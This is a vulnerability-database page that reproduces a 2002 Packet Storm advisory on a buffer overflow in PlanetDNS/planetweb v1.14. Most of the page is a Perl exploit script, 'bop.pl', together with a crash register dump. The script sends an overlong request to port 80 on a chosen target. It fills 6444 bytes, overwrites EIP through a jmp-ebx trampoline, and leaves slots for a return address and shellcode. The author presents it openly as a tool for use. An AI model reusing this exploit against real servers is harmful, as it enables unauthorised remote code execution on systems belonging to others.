Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

bop.pl

🗓️ 21 Oct 2002 00:00:00Reported by Securma MassineType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

PlanetDNS software is vulnerable to buffer overflow, leading to potential remote code execution.

Code
`hi  
planetdns ( http://www.planetdns.net)is  
commercial software package that allows to  
turn computer into an Internet server.  
and be able to create an Internet Name, connect to  
a web server, FTP, mail server, etc. running  
on computer.  
planetdns is vulnerable has a buffer overflow with a  
overwrite of eip (never posted before )... one already  
notified that a number of 1024 byte could crasher the  
server, and I found that while sending (without GET/)un of  
6500 byte could thus make a overwrite eip of execution of a  
shellcode, the overwrite is done with byte 6449, 50, 51,  
52.  
one notices of aillor that ebx and always 4byte before the  
eip the ret address will be thus a jmp ebx or call ebx that  
one finds in many modules charged .  
I realised an exploit tested on plaetweb v1.14 and who  
gives L state of the following registers:  
Access violation - code c0000005 (first chance)  
eax=0217dfb0 ebx=0217ffdc ecx=43434343 edx=7846f5b5  
esi=0217dfd8 edi=00000000  
eip=43434343 esp=0217df18 ebp=0217df38 iopl=0 nv up  
ei pl zr na po nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b  
gs=0000 efl=00000246  
43434343 ?? ???  
exploit code:  
  
  
#!/usr/bin/perl -w  
#tool bop.pl  
# buffer overflow tested against plaetweb v1.14  
# humm..this exploit is not for lamers...  
# Greetz: marocit and #crack.fr (specialemet  
#  
  
use IO::Socket;  
if ($#ARGV<0)  
{  
print "\n write the target IP!! \n\n";  
exit;  
}  
  
$shellcode = ("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");  
#add your favorit shellcode  
$buffer = "A"x6444;  
$ebx = "\x90\xEB\x08\x90";# you have the chance because ebx = eip - 4 bytes jmp short 0xff x0d3  
$ret = "\x43\x43\x43\x43";# insert your ret address with (jmp ebx or call ebx)  
$minibuf ="\x90\x90\x90\x90";# will be jumped by EB08  
$connect = IO::Socket::INET ->new (Proto=>"tcp", PeerAddr=> "$ARGV[0]", PeerPort=>"80"); unless ($connect) { die "cant connect $ARGV [0]" }  
print $connect "$buffer$ebx$ret$minibuf$shellcode";  
print "\nsending exploit......\n\n";  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Oct 2002 00:00Current
7.4High risk
Vulners AI Score7.4
buffer overflow vulnerabilityplanetdns softwareremote code executionexploit code
19